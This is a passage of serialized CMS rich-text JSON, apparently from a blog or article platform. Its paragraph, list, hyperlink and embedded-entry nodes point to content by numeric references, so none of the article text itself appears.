,"value":770,"marks":56316,"data":56317},[],{},{"nodeType":186,"data":56319,"content":56320},{"uri":775},[56321],{"nodeType":173,"value":778,"marks":56322,"data":56323},[],{},{"nodeType":173,"value":782,"marks":56325,"data":56326},[],{},{"nodeType":178,"data":56328,"content":56329},{},[56330],{"nodeType":173,"value":789,"marks":56331,"data":56334},[56332,56333],{"type":370},{"type":194},{},{"nodeType":178,"data":56336,"content":56337},{},[56338],{"nodeType":173,"value":798,"marks":56339,"data":56340},[],{},{"nodeType":178,"data":56342,"content":56343},{},[56344],{"nodeType":173,"value":805,"marks":56345,"data":56348},[56346,56347],{"type":370},{"type":194},{},{"nodeType":178,"data":56350,"content":56351},{},[56352,56355,56362,56365,56372],{"nodeType":173,"value":814,"marks":56353,"data":56354},[],{},{"nodeType":186,"data":56356,"content":56357},{"uri":819},[56358],{"nodeType":173,"value":822,"marks":56359,"data":56361},[56360],{"type":194},{},{"nodeType":173,"value":827,"marks":56363,"data":56364},[],{},{"nodeType":186,"data":56366,"content":56367},{"uri":832},[56368],{"nodeType":173,"value":835,"marks":56369,"data":56371},[56370],{"type":194},{},{"nodeType":173,"value":840,"marks":56373,"data":56374},[],{},{"nodeType":178,"data":56376,"content":56377},{},[56378],{"nodeType":173,"value":847,"marks":56379,"data":56382},[56380,56381],{"type":370},{"type":194},{},{"nodeType":178,"data":56384,"content":56385},{},[56386],{"nodeType":173,"value":856,"marks":56387,"data":56388},[],{},{"nodeType":178,"data":56390,"content":56391},{},[56392],{"nodeType":173,"value":863,"marks":56393,"data":56396},[56394,56395],{"type":370},{"type":194},{},{"nodeType":178,"data":56398,"content":56399},{},[56400,56403,56410],{"nodeType":173,"value":872,"marks":56401,"data":56402},[],{},{"nodeType":186,"data":56404,"content":56405},{"uri":832},[56406],{"nodeType":173,"value":835,"marks":56407,"data":56409},[56408],{"type":194},{},{"nodeType":173,"value":883,"marks":56411,"data":56412},[],{},{"nodeType":312,"data":56414,"content":56417},{"target":56415},{"sys":56416},{"id":890,"type":317,"linkType":318},[],{"nodeType":178,"data":56419,"content":56420},{},[56421],{"nodeType":173,"value":896,"marks":56422,"data":56425},[56423,56424],{"type":370},{"type":194},{},{"nodeType":178,"data":56427,"content":56428},{},[56429],{"nodeType":173,"value":905,"marks":56430,"data":56431},[],{},{"nodeType":178,"data":56433,"content":56434},{},[56435],{"nodeType":173,"value":912,"marks":56436,"data":56439},[56437,56438],{"type":370},{"type":194},{},{"nodeType":178,"data":56441,"content":56442},{},[56443,56446,56452,56455,56461,56464,56470],{"nodeType":173,"value":921,"marks":56444,"data":56445},[],{},{"nodeType":186,"data":56447,"content":56448},{"uri":926},[56449],{"nodeType":173,"value":929,"marks":56450,"data":56451},[],{},{"nodeType":173,"value":933,"marks":56453,"data":56454},[],{},{"nodeType":186,"data":56456,"content":56457},{"uri":938},[56458],{"nodeType":173,"value":941,"marks":56459,"data":56460},[],{},{"nodeType":173,"value":945,"marks":56462,"data":56463},[],{},{"nodeType":186,"data":56465,"content":56466},{"uri":950},[56467],{"nodeType":173,"value":953,"marks":56468,"data":56469},[],{},{"nodeType":173,"value":957,"marks":56471,"data":56472},[],{},{"nodeType":231,"data":56474,"content":56475},{},[],{"nodeType":235,"data":56477,"content":56478},{},[56479],{"nodeType":173,"value":967,"marks":56480,"data":56482},[56481],{"type":370},{},{"nodeType":178,"data":56484,"content":56485},{},[56486],{"nodeType":173,"value":975,"marks":56487,"data":56490},[56488,56489],{"type":370},{"type":194},{},{"nodeType":178,"data":56492,"content":56493},{},[56494,56497,56504],{"nodeType":173,"value":984,"marks":56495,"data":56496},[],{},{"nodeType":186,"data":56498,"content":56499},{"uri":989},[56500],{"nodeType":173,"value":992,"marks":56501,"data":56503},[56502],{"type":194},{},{"nodeType":173,"value":997,"marks":56505,"data":56506},[],{},{"nodeType":178,"data":56508,"content":56509},{},[56510],{"nodeType":173,"value":1004,"marks":56511,"data":56514},[56512,56513],{"type":370},{"type":194},{},{"nodeType":178,"data":56516,"content":56517},{},[56518],{"nodeType":173,"value":1013,"marks":56519,"data":56520},[],{},{"nodeType":178,"data":56522,"content":56523},{},[56524],{"nodeType":173,"value":1020,"marks":56525,"data":56528},[56526,56527],{"type":370},{"type":194},{},{"nodeType":178,"data":56530,"content":56531},{},[56532,56535,56542,56545,56552],{"nodeType":173,"value":1029,"marks":56533,"data":56534},[],{},{"nodeType":186,"data":56536,"content":56537},{"uri":1034},[56538],{"nodeType":173,"value":1037,"marks":56539,"data":56541},[56540],{"type":194},{},{"nodeType":173,"value":1042,"marks":56543,"data":56544},[],{},{"nodeType":186,"data":56546,"content":56547},{"uri":1047},[56548],{"nodeType":173,"value":1050,"marks":56549,"data":56551},[56550],{"type":194},{},{"nodeType":173,"value":1055,"marks":56553,"data":56554},[],{},{"nodeType":312,"data":56556,"content":56559},{"target":56557},{"sys":56558},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":56561,"content":56562},{},[56563],{"nodeType":173,"value":1068,"marks":56564,"data":56567},[56565,56566],{"type":370},{"type":194},{},{"nodeType":178,"data":56569,"content":56570},{},[56571],{"nodeType":173,"value":1077,"marks":56572,"data":56573},[],{},{"nodeType":312,"data":56575,"content":56578},{"target":56576},{"sys":56577},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":56580,"content":56581},{},[],{"nodeType":235,"data":56583,"content":56584},{},[56585],{"nodeType":173,"value":1093,"marks":56586,"data":56588},[56587],{"type":370},{},{"nodeType":178,"data":56590,"content":56591},{},[56592],{"nodeType":173,"value":1101,"marks":56593,"data":56596},[56594,56595],{"type":370},{"type":194},{},{"nodeType":178,"data":56598,"content":56599},{},[56600],{"nodeType":173,"value":1110,"marks":56601,"data":56602},[],{},{"nodeType":250,"data":56604,"content":56605},{},[56606,56619,56632],{"nodeType":254,"data":56607,"content":56608},{},[56609],{"nodeType":178,"data":56610,"content":56611},{},[56612,56616],{"nodeType":173,"value":1123,"marks":56613,"data":56615},[56614],{"type":370},{},{"nodeType":173,"value":1128,"marks":56617,"data":56618},[],{},{"nodeType":254,"data":56620,"content":56621},{},[56622],{"nodeType":178,"data":56623,"content":56624},{},[56625,56629],{"nodeType":173,"value":1138,"marks":56626,"data":56628},[56627],{"type":370},{},{"nodeType":173,"value":1143,"marks":56630,"data":56631},[],{},{"nodeType":254,"data":56633,"content":56634},{},[56635],{"nodeType":178,"data":56636,"content":56637},{},[56638,56642,56645,56651],{"nodeType":173,"value":1153,"marks":56639,"data":56641},[56640],{"type":370},{},{"nodeType":173,"value":1158,"marks":56643,"data":56644},[],{},{"nodeType":186,"data":56646,"content":56647},{"uri":1163},[56648],{"nodeType":173,"value":1166,"marks":56649,"data":56650},[],{},{"nodeType":173,"value":1170,"marks":56652,"data":56653},[],{},{"nodeType":312,"data":56655,"content":56658},{"target":56656},{"sys":56657},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":56660,"content":56661},{},[],{"nodeType":235,"data":56663,"content":56664},{},[56665],{"nodeType":173,"value":1186,"marks":56666,"data":56668},[56667],{"type":370},{},{"nodeType":178,"data":56670,"content":56671},{},[56672],{"nodeType":173,"value":1194,"marks":56673,"data":56676},[56674,56675],{"type":370},{"type":194},{},{"nodeType":178,"data":56678,"content":56679},{},[56680],{"nodeType":173,"value":1203,"marks":56681,"data":56682},[],{},{"nodeType":312,"data":56684,"content":56687},{"target":56685},{"sys":56686},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":56689,"content":56690},{},[],{"nodeType":169,"data":56692,"content":56693},{},[56694],{"nodeType":173,"value":1219,"marks":56695,"data":56697},[56696],{"type":370},{},{"nodeType":178,"data":56699,"content":56700},{},[56701],{"nodeType":173,"value":1227,"marks":56702,"data":56703},[],{},{"nodeType":178,"data":56705,"content":56706},{},[56707],{"nodeType":173,"value":1234,"marks":56708,"data":56709},[],{},{"nodeType":250,"data":56711,"content":56712},{},[56713,56732,56751],{"nodeType":254,"data":56714,"content":56715},{},[56716],{"nodeType":178,"data":56717,"content":56718},{},[56719,56722,56729],{"nodeType":173,"value":1247,"marks":56720,"data":56721},[],{},{"nodeType":186,"data":56723,"content":56724},{"uri":1252},[56725],{"nodeType":173,"value":1255,"marks":56726,"data":56728},[56727],{"type":194},{},{"nodeType":173,"value":1260,"marks":56730,"data":56731},[],{},{"nodeType":254,"data":56733,"content":56734},{},[56735],{"nodeType":178,"data":56736,"content":56737},{},[56738,56741,56748],{"nodeType":173,"value":1270,"marks":56739,"data":56740},[],{},{"nodeType":186,"data":56742,"content":56743},{"uri":1275},[56744],{"nodeType":173,"value":1278,"marks":56745,"data":56747},[56746],{"type":194},{},{"nodeType":173,"value":1260,"marks":56749,"data":56750},[],{},{"nodeType":254,"data":56752,"content":56753},{},[56754],{"nodeType":178,"data":56755,"content":56756},{},[56757,56760,56767],{"nodeType":173,"value":1292,"marks":56758,"data":56759},[],{},{"nodeType":186,"data":56761,"content":56762},{"uri":1297},[56763],{"nodeType":173,"value":1300,"marks":56764,"data":56766},[56765],{"type":194},{},{"nodeType":173,"value":1260,"marks":56768,"data":56769},[],{},{"nodeType":178,"data":56771,"content":56772},{},[56773],{"nodeType":173,"value":1311,"marks":56774,"data":56775},[],{},{"nodeType":250,"data":56777,"content":56778},{},[56779,56792,56805,56818],{"nodeType":254,"data":56780,"content":56781},{},[56782],{"nodeType":178,"data":56783,"content":56784},{},[56785,56789],{"nodeType":173,"value":1324,"marks":56786,"data":56788},[56787],{"type":370},{},{"nodeType":173,"value":1329,"marks":56790,"data":56791},[],{},{"nodeType":254,"data":56793,"content":56794},{},[56795],{"nodeType":178,"data":56796,"content":56797},{},[56798,56802],{"nodeType":173,"value":1339,"marks":56799,"data":56801},[56800],{"type":370},{},{"nodeType":173,"value":1344,"marks":56803,"data":56804},[],{},{"nodeType":254,"data":56806,"content":56807},{},[56808],{"nodeType":178,"data":56809,"content":56810},{},[56811,56815],{"nodeType":173,"value":1354,"marks":56812,"data":56814},[56813],{"type":370},{},{"nodeType":173,"value":1359,"marks":56816,"data":56817},[],{},{"nodeType":254,"data":56819,"content":56820},{},[56821],{"nodeType":178,"data":56822,"content":56823},{},[56824,56828],{"nodeType":173,"value":1369,"marks":56825,"data":56827},[56826],{"type":370},{},{"nodeType":173,"value":1374,"marks":56829,"data":56830},[],{},{"nodeType":178,"data":56832,"content":56833},{},[56834],{"nodeType":173,"value":1381,"marks":56835,"data":56836},[],{},{"nodeType":231,"data":56838,"content":56839},{},[],{"nodeType":169,"data":56841,"content":56842},{},[56843],{"nodeType":173,"value":1391,"marks":56844,"data":56846},[56845],{"type":370},{},{"nodeType":178,"data":56848,"content":56849},{},[56850],{"nodeType":173,"value":1399,"marks":56851,"data":56852},[],{},{"nodeType":178,"data":56854,"content":56855},{},[56856],{"nodeType":173,"value":1406,"marks":56857,"data":56858},[],{},{"nodeType":312,"data":56860,"content":56863},{"target":56861},{"sys":56862},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":56865,"content":56866},{},[],{"nodeType":169,"data":56868,"content":56869},{},[56870],{"nodeType":173,"value":1422,"marks":56871,"data":56873},[56872],{"type":370},{},{"nodeType":178,"data":56875,"content":56876},{},[56877],{"nodeType":173,"value":1430,"marks":56878,"data":56879},[],{},{"nodeType":178,"data":56881,"content":56882},{},[56883],{"nodeType":173,"value":1437,"marks":56884,"data":56885},[],{},{"nodeType":178,"data":56887,"content":56888},{},[56889],{"nodeType":173,"value":1444,"marks":56890,"data":56891},[],{},{"nodeType":178,"data":56893,"content":56894},{},[56895,56898,56905,56908,56915],{"nodeType":173,"value":1451,"marks":56896,"data":56897},[],{},{"nodeType":186,"data":56899,"content":56900},{"uri":1456},[56901],{"nodeType":173,"value":1459,"marks":56902,"data":56904},[56903],{"type":194},{},{"nodeType":173,"value":1464,"marks":56906,"data":56907},[],{},{"nodeType":186,"data":56909,"content":56910},{"uri":1469},[56911],{"nodeType":173,"value":1472,"marks":56912,"data":56914},[56913],{"type":194},{},{"nodeType":173,"value":1477,"marks":56916,"data":56917},[],{},{"items":56919},[56920,56922],{"sys":56921,"name":505},{"id":504},{"sys":56923,"name":509},{"id":508},{"items":56925},[56926],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":56927},{"url":1496},{"__typename":1528,"sys":56929,"content":56930,"title":41689,"synopsis":41690,"hashTags":118,"publishedDate":41691,"slug":41692,"tagsCollection":57266,"authorsCollection":57272},{"id":24155},{"json":56931},{"data":56932,"content":56933,"nodeType":165},{},[56934,56941,56947,56952,56958,56988,56994,56999,57005,57010,57015,57020,57025,57030,57033,57040,57046,57052,57058,57065,57070,57086,57092,57108,57113,57116,57123,57129,57195,57201,57204,57211,57217,57223,57229,57255,57260],{"data":56935,"content":56936,"nodeType":169},{},[56937],{"data":56938,"marks":56939,"value":14096,"nodeType":173},{},[56940],{"type":370},{"data":56942,"content":56943,"nodeType":178},{},[56944],{"data":56945,"marks":56946,"value":41335,"nodeType":173},{},[],{"data":56948,"content":56951,"nodeType":312},{"target":56949},{"sys":56950},{"id":41340,"type":317,"linkType":318},[],{"data":56953,"content":56954,"nodeType":178},{},[56955],{"data":56956,"marks":56957,"value":41348,"nodeType":173},{},[],{"data":56959,"content":56960,"nodeType":250},{},[56961,56970,56979],{"data":56962,"content":56963,"nodeType":254},{},[56964],{"data":56965,"content":56966,"nodeType":178},{},[56967],{"data":56968,"marks":56969,"value":41361,"nodeType":173},{},[],{"data":56971,"content":56972,"nodeType":254},{},[56973],{"data":56974,"content":56975,"nodeType":178},{},[56976],{"data":56977,"marks":56978,"value":41371,"nodeType":173},{},[],{"data":56980,"content":56981,"nodeType":254},{},[56982],{"data":56983,"content":56984,"nodeType":178},{},[56985],{"data":56986,"marks":56987,"value":41381,"nodeType":173},{},[],{"data":56989,"content":56990,"nodeType":178},{},[56991],{"data":56992,"marks":56993,"value":41388,"nodeType":173},{},[],{"data":56995,"content":56998,"nodeType":312},{"target":56996},{"sys":56997},{"id":41393,"type":317,"linkType":318},[],{"data":57000,"content":57001,"nodeType":178},{},[57002],{"data":57003,"marks":57004,"value":41401,"nodeType":173},{},[],{"data":57006,"content":57009,"nodeType":312},{"target":57007},{"sys":57008},{"id":41406,"type":317,"linkType":318},[],{"data":57011,"content":57014,"nodeType":312},{"target":57012},{"sys":57013},{"id":41412,"type":317,"linkType":318},[],{"data":57016,"content":57019,"nodeType":312},{"target":57017},{"sys":57018},{"id":41418,"type":317,"linkType":318},[],{"data":57021,"content":57024,"nodeType":312},{"target":57022},{"sys":57023},{"id":41424,"type":317,"linkType":318},[],{"data":57026,"content":57029,"nodeType":312},{"target":57027},{"sys":57028},{"id":41430,"type":317,"linkType":318},[],{"data":57031,"content":57032,"nodeType":231},{},[],{"data":57034,"content":57035,"nodeType":169},{},[57036],{"data":57037,"marks":57038,"value":41442,"nodeType":173},{},[57039],{"type":370},{"data":57041,"content":57042,"nodeType":178},{},[57043],{"data":57044,"marks":57045,"value":41449,"nodeType":173},{},[],{"data":57047,"content":57048,"nodeType":178},{},[57049],{"data":57050,"marks":57051,"value":41456,"nodeType":173},{},[],{"data":57053,"content":57054,"nodeType":178},{},[57055],{"data":57056,"marks":57057,"value":41463,"nodeType":173},{},[],{"data":57059,"content":57060,"nodeType":178},{},[57061],{"data":57062,"marks":57063,"value":41471,"nodeType":173},{},[57064],{"type":370},{"data":57066,"content":57069,"nodeType":312},{"target":57067},{"sys":57068},{"id":41476,"type":317,"linkType":318},[],{"data":57071,"content":57072,"nodeType":178},{},[57073,57076,57083],{"data":57074,"marks":57075,"value":41484,"nodeType":173},{},[],{"data":57077,"content":57078,"nodeType":186},{"uri":1842},[57079],{"data":57080,"marks":57081,"value":1845,"nodeType":173},{},[57082],{"type":194},{"data":57084,"marks":57085,"value":41495,"nodeType":173},{},[],{"data":57087,"content":57088,"nodeType":178},{},[57089],{"data":57090,"marks":57091,"value":41502,"nodeType":173},{},[],{"data":57093,"content":57094,"nodeType":178},{},[57095,57098,57105],{"data":57096,"marks":57097,"value":41509,"nodeType":173},{},[],{"data":57099,"content":57100,"nodeType":186},{"uri":5002},[57101],{"data":57102,"marks":57103,"value":6811,"nodeType":173},{},[57104],{"type":194},{"data":57106,"marks":57107,"value":41073,"nodeType":173},{},[],{"data":57109,"content":57112,"nodeType":312},{"target":57110},{"sys":57111},{"id":8590,"type":317,"linkType":318},[],{"data":57114,"content":57115,"nodeType":231},{},[],{"data":57117,"content":57118,"nodeType":169},{},[57119],{"data":57120,"marks":57121,"value":8406,"nodeType":173},{},[57122],{"type":370},{"data":57124,"content":57125,"nodeType":178},{},[57126],{"data":57127,"marks":57128,"value":41541,"nodeType":173},{},[],{"data":57130,"content":57131,"nodeType":250},{},[57132,57141,57150,57159,57168,57177,57186],{"data":57133,"content":57134,"nodeType":254},{},[57135],{"data":57136,"content":57137,"nodeType":178},{},[57138],{"data":57139,"marks":57140,"value":41554,"nodeType":173},{},[],{"data":57142,"content":57143,"nodeType":254},{},[57144],{"data":57145,"content":57146,"nodeType":178},{},[57147],{"data":57148,"marks":57149,"value":41564,"nodeType":173},{},[],{"data":57151,"content":57152,"nodeType":254},{},[57153],{"data":57154,"content":57155,"nodeType":178},{},[57156],{"data":57157,"marks":57158,"value":41574,"nodeType":173},{},[],{"data":57160,"content":57161,"nodeType":254},{},[57162],{"data":57163,"content":57164,"nodeType":178},{},[57165],{"data":57166,"marks":57167,"value":41584,"nodeType":173},{},[],{"data":57169,"content":57170,"nodeType":254},{},[57171],{"data":57172,"content":57173,"nodeType":178},{},[57174],{"data":57175,"marks":57176,"value":41594,"nodeType":173},{},[],{"data":57178,"content":57179,"nodeType":254},{},[57180],{"data":57181,"content":57182,"nodeType":178},{},[57183],{"data":57184,"marks":57185,"value":41604,"nodeType":173},{},[],{"data":57187,"content":57188,"nodeType":254},{},[57189],{"data":57190,"content":57191,"nodeType":178},{},[57192],{"data":57193,"marks":57194,"value":41614,"nodeType":173},{},[],{"data":57196,"content":57197,"nodeType":178},{},[57198],{"data":57199,"marks":57200,"value":41621,"nodeType":173},{},[],{"data":57202,"content":57203,"nodeType":231},{},[],{"data":57205,"content":57206,"nodeType":169},{},[57207],{"data":57208,"marks":57209,"value":8517,"nodeType":173},{},[57210],{"type":370},{"data":57212,"content":57213,"nodeType":178},{},[57214],{"data":57215,"marks":57216,"value":41638,"nodeType":173},{},[],{"data":57218,"content":57219,"nodeType":178},{},[57220],{"data":57221,"marks":57222,"value":41645,"nodeType":173},{},[],{"data":57224,"content":57225,"nodeType":178},{},[57226],{"data":57227,"marks":57228,"value":14340,"nodeType":173},{},[],{"data":57230,"content":57231,"nodeType":178},{},[57232,57235,57242,57245,57252],{"data":57233,"marks":57234,"value":1451,"nodeType":173},{},[],{"data":57236,"content":57237,"nodeType":186},{"uri":1456},[57238],{"data":57239,"marks":57240,"value":1459,"nodeType":173},{},[57241],{"type":194},{"data":57243,"marks":57244,"value":1464,"nodeType":173},{},[],{"data":57246,"content":57247,"nodeType":186},{"uri":1469},[57248],{"data":57249,"marks":57250,"value":1472,"nodeType":173},{},[57251],{"type":194},{"data":57253,"marks":57254,"value":1477,"nodeType":173},{},[],{"data":57256,"content":57259,"nodeType":312},{"target":57257},{"sys":57258},{"id":8590,"type":317,"linkType":318},[],{"data":57261,"content":57262,"nodeType":178},{},[57263],{"data":57264,"marks":57265,"value":37,"nodeType":173},{},[],{"items":57267},[57268,57270],{"sys":57269,"name":509},{"id":508},{"sys":57271,"name":505},{"id":504},{"items":57273},[57274],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":57275},{"url":1496},{"items":57277},[57278],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":57279},{"url":8615},{"json":57281,"links":57788},{"data":57282,"content":57283,"nodeType":165},{},[57284,57290,57296,57302,57307,57313,57316,57323,57329,57335,57341,57346,57352,57357,57363,57368,57374,57379,57405,57411,57416,57422,57427,57433,57438,57444,57483,57486,57493,57499,57505,57511,57516,57519,57526,57532,57548,57553,57558,57563,57569,57574,57579,57595,57598,57605,57621,57626,57632,57648,57655,57661,57667,57673,57689,57696,57702,57707,57710,57717,57723,57729,57732,57739,57745,57751,57777,57782],{"data":57285,"content":57286,"nodeType":178},{},[57287],{"data":57288,"marks":57289,"value":41716,"nodeType":173},{},[],{"data":57291,"content":57292,"nodeType":178},{},[57293],{"data":57294,"marks":57295,"value":41723,"nodeType":173},{},[],{"data":57297,"content":57298,"nodeType":178},{},[57299],{"data":57300,"marks":57301,"value":41730,"nodeType":173},{},[],{"data":57303,"content":57306,"nodeType":312},{"target":57304},{"sys":57305},{"id":41735,"type":317,"linkType":318},[],{"data":57308,"content":57309,"nodeType":178},{},[57310],{"data":57311,"marks":57312,"value":41743,"nodeType":173},{},[],{"data":57314,"content":57315,"nodeType":231},{},[],{"data":57317,"content":57318,"nodeType":169},{},[57319],{"data":57320,"marks":57321,"value":41754,"nodeType":173},{},[57322],{"type":370},{"data":57324,"content":57325,"nodeType":178},{},[57326],{"data":57327,"marks":57328,"value":41761,"nodeType":173},{},[],{"data":57330,"content":57331,"nodeType":178},{},[57332],{"data":57333,"marks":57334,"value":41768,"nodeType":173},{},[],{"data":57336,"content":57337,"nodeType":178},{},[57338],{"data":57339,"marks":57340,"value":41775,"nodeType":173},{},[],{"data":57342,"content":57345,"nodeType":312},{"target":57343},{"sys":57344},{"id":41780,"type":317,"linkType":318},[],{"data":57347,"content":57348,"nodeType":178},{},[57349],{"data":57350,"marks":57351,"value":41788,"nodeType":173},{},[],{"data":57353,"content":57356,"nodeType":312},{"target":57354},{"sys":57355},{"id":41793,"type":317,"linkType":318},[],{"data":57358,"content":57359,"nodeType":178},{},[57360],{"data":57361,"marks":57362,"value":41801,"nodeType":173},{},[],{"data":57364,"content":57367,"nodeType":312},{"target":57365},{"sys":57366},{"id":41806,"type":317,"linkType":318},[],{"data":57369,"content":57370,"nodeType":178},{},[57371],{"data":57372,"marks":57373,"value":41814,"nodeType":173},{},[],{"data":57375,"content":57378,"nodeType":312},{"target":57376},{"sys":57377},{"id":41819,"type":317,"linkType":318},[],{"data":57380,"content":57381,"nodeType":178},{},[57382,57385,57392,57395,57402],{"data":57383,"marks":57384,"value":41827,"nodeType":173},{},[],{"data":57386,"content":57387,"nodeType":186},{"uri":7853},[57388],{"data":57389,"marks":57390,"value":41835,"nodeType":173},{},[57391],{"type":194},{"data":57393,"marks":57394,"value":41839,"nodeType":173},{},[],{"data":57396,"content":57397,"nodeType":186},{"uri":6820},[57398],{"data":57399,"marks":57400,"value":13298,"nodeType":173},{},[57401],{"type":194},{"data":57403,"marks":57404,"value":41850,"nodeType":173},{},[],{"data":57406,"content":57407,"nodeType":178},{},[57408],{"data":57409,"marks":57410,"value":41857,"nodeType":173},{},[],{"data":57412,"content":57415,"nodeType":312},{"target":57413},{"sys":57414},{"id":41862,"type":317,"linkType":318},[],{"data":57417,"content":57418,"nodeType":178},{},[57419],{"data":57420,"marks":57421,"value":41870,"nodeType":173},{},[],{"data":57423,"content":57426,"nodeType":312},{"target":57424},{"sys":57425},{"id":41875,"type":317,"linkType":318},[],{"data":57428,"content":57429,"nodeType":178},{},[57430],{"data":57431,"marks":57432,"value":41883,"nodeType":173},{},[],{"data":57434,"content":57437,"nodeType":312},{"target":57435},{"sys":57436},{"id":41888,"type":317,"linkType":318},[],{"data":57439,"content":57440,"nodeType":178},{},[57441],{"data":57442,"marks":57443,"value":41896,"nodeType":173},{},[],{"data":57445,"content":57446,"nodeType":250},{},[57447,57456,57465,57474],{"data":57448,"content":57449,"nodeType":254},{},[57450],{"data":57451,"content":57452,"nodeType":178},{},[57453],{"data":57454,"marks":57455,"value":41909,"nodeType":173},{},[],{"data":57457,"content":57458,"nodeType":254},{},[57459],{"data":57460,"content":57461,"nodeType":178},{},[57462],{"data":57463,"marks":57464,"value":41919,"nodeType":173},{},[],{"data":57466,"content":57467,"nodeType":254},{},[57468],{"data":57469,"content":57470,"nodeType":178},{},[57471],{"data":57472,"marks":57473,"value":41929,"nodeType":173},{},[],{"data":57475,"content":57476,"nodeType":254},{},[57477],{"data":57478,"content":57479,"nodeType":178},{},[57480],{"data":57481,"marks":57482,"value":41939,"nodeType":173},{},[],{"data":57484,"content":57485,"nodeType":231},{},[],{"data":57487,"content":57488,"nodeType":169},{},[57489],{"data":57490,"marks":57491,"value":41950,"nodeType":173},{},[57492],{"type":370},{"data":57494,"content":57495,"nodeType":178},{},[57496],{"data":57497,"marks":57498,"value":41957,"nodeType":173},{},[],{"data":57500,"content":57501,"nodeType":178},{},[57502],{"data":57503,"marks":57504,"value":41964,"nodeType":173},{},[],{"data":57506,"content":57507,"nodeType":178},{},[57508],{"data":57509,"marks":57510,"value":41971,"nodeType":173},{},[],{"data":57512,"content":57515,"nodeType":312},{"target":57513},{"sys":57514},{"id":41976,"type":317,"linkType":318},[],{"data":57517,"content":57518,"nodeType":231},{},[],{"data":57520,"content":57521,"nodeType":169},{},[57522],{"data":57523,"marks":57524,"value":41988,"nodeType":173},{},[57525],{"type":370},{"data":57527,"content":57528,"nodeType":178},{},[57529],{"data":57530,"marks":57531,"value":41995,"nodeType":173},{},[],{"data":57533,"content":57534,"nodeType":178},{},[57535,57538,57545],{"data":57536,"marks":57537,"value":42002,"nodeType":173},{},[],{"data":57539,"content":57540,"nodeType":186},{"uri":42005},[57541],{"data":57542,"marks":57543,"value":42011,"nodeType":173},{},[57544],{"type":194},{"data":57546,"marks":57547,"value":42015,"nodeType":173},{},[],{"data":57549,"content":57552,"nodeType":312},{"target":57550},{"sys":57551},{"id":42020,"type":317,"linkType":318},[],{"data":57554,"content":57557,"nodeType":312},{"target":57555},{"sys":57556},{"id":42026,"type":317,"linkType":318},[],{"data":57559,"content":57562,"nodeType":312},{"target":57560},{"sys":57561},{"id":42032,"type":317,"linkType":318},[],{"data":57564,"content":57565,"nodeType":178},{},[57566],{"data":57567,"marks":57568,"value":42040,"nodeType":173},{},[],{"data":57570,"content":57573,"nodeType":312},{"target":57571},{"sys":57572},{"id":42045,"type":317,"linkType":318},[],{"data":57575,"content":57578,"nodeType":312},{"target":57576},{"sys":57577},{"id":42051,"type":317,"linkType":318},[],{"data":57580,"content":57581,"nodeType":178},{},[57582,57585,57592],{"data":57583,"marks":57584,"value":42059,"nodeType":173},{},[],{"data":57586,"content":57587,"nodeType":186},{"uri":42062},[57588],{"data":57589,"marks":57590,"value":42068,"nodeType":173},{},[57591],{"type":194},{"data":57593,"marks":57594,"value":42072,"nodeType":173},{},[],{"data":57596,"content":57597,"nodeType":231},{},[],{"data":57599,"content":57600,"nodeType":169},{},[57601],{"data":57602,"marks":57603,"value":42083,"nodeType":173},{},[57604],{"type":370},{"data":57606,"content":57607,"nodeType":178},{},[57608,57611,57618],{"data":57609,"marks":57610,"value":42090,"nodeType":173},{},[],{"data":57612,"content":57613,"nodeType":186},{"uri":42093},[57614],{"data":57615,"marks":57616,"value":8157,"nodeType":173},{},[57617],{"type":194},{"data":57619,"marks":57620,"value":42102,"nodeType":173},{},[],{"data":57622,"content":57625,"nodeType":312},{"target":57623},{"sys":57624},{"id":42107,"type":317,"linkType":318},[],{"data":57627,"content":57628,"nodeType":178},{},[57629],{"data":57630,"marks":57631,"value":42115,"nodeType":173},{},[],{"data":57633,"content":57634,"nodeType":178},{},[57635,57638,57645],{"data":57636,"marks":57637,"value":41484,"nodeType":173},{},[],{"data":57639,"content":57640,"nodeType":186},{"uri":1842},[57641],{"data":57642,"marks":57643,"value":1845,"nodeType":173},{},[57644],{"type":194},{"data":57646,"marks":57647,"value":41495,"nodeType":173},{},[],{"data":57649,"content":57650,"nodeType":235},{},[57651],{"data":57652,"marks":57653,"value":42139,"nodeType":173},{},[57654],{"type":370},{"data":57656,"content":57657,"nodeType":178},{},[57658],{"data":57659,"marks":57660,"value":42146,"nodeType":173},{},[],{"data":57662,"content":57663,"nodeType":178},{},[57664],{"data":57665,"marks":57666,"value":42153,"nodeType":173},{},[],{"data":57668,"content":57669,"nodeType":178},{},[57670],{"data":57671,"marks":57672,"value":41463,"nodeType":173},{},[],{"data":57674,"content":57675,"nodeType":178},{},[57676,57679,57686],{"data":57677,"marks":57678,"value":42166,"nodeType":173},{},[],{"data":57680,"content":57681,"nodeType":186},{"uri":5002},[57682],{"data":57683,"marks":57684,"value":6811,"nodeType":173},{},[57685],{"type":194},{"data":57687,"marks":57688,"value":42177,"nodeType":173},{},[],{"data":57690,"content":57691,"nodeType":235},{},[57692],{"data":57693,"marks":57694,"value":42185,"nodeType":173},{},[57695],{"type":370},{"data":57697,"content":57698,"nodeType":178},{},[57699],{"data":57700,"marks":57701,"value":42192,"nodeType":173},{},[],{"data":57703,"content":57706,"nodeType":312},{"target":57704},{"sys":57705},{"id":42197,"type":317,"linkType":318},[],{"data":57708,"content":57709,"nodeType":231},{},[],{"data":57711,"content":57712,"nodeType":169},{},[57713],{"data":57714,"marks":57715,"value":8406,"nodeType":173},{},[57716],{"type":370},{"data":57718,"content":57719,"nodeType":178},{},[57720],{"data":57721,"marks":57722,"value":42215,"nodeType":173},{},[],{"data":57724,"content":57725,"nodeType":178},{},[57726],{"data":57727,"marks":57728,"value":41621,"nodeType":173},{},[],{"data":57730,"content":57731,"nodeType":231},{},[],{"data":57733,"content":57734,"nodeType":169},{},[57735],{"data":57736,"marks":57737,"value":2824,"nodeType":173},{},[57738],{"type":370},{"data":57740,"content":57741,"nodeType":178},{},[57742],{"data":57743,"marks":57744,"value":42238,"nodeType":173},{},[],{"data":57746,"content":57747,"nodeType":178},{},[57748],{"data":57749,"marks":57750,"value":1444,"nodeType":173},{},[],{"data":57752,"content":57753,"nodeType":178},{},[57754,57757,57764,57767,57774],{"data":57755,"marks":5775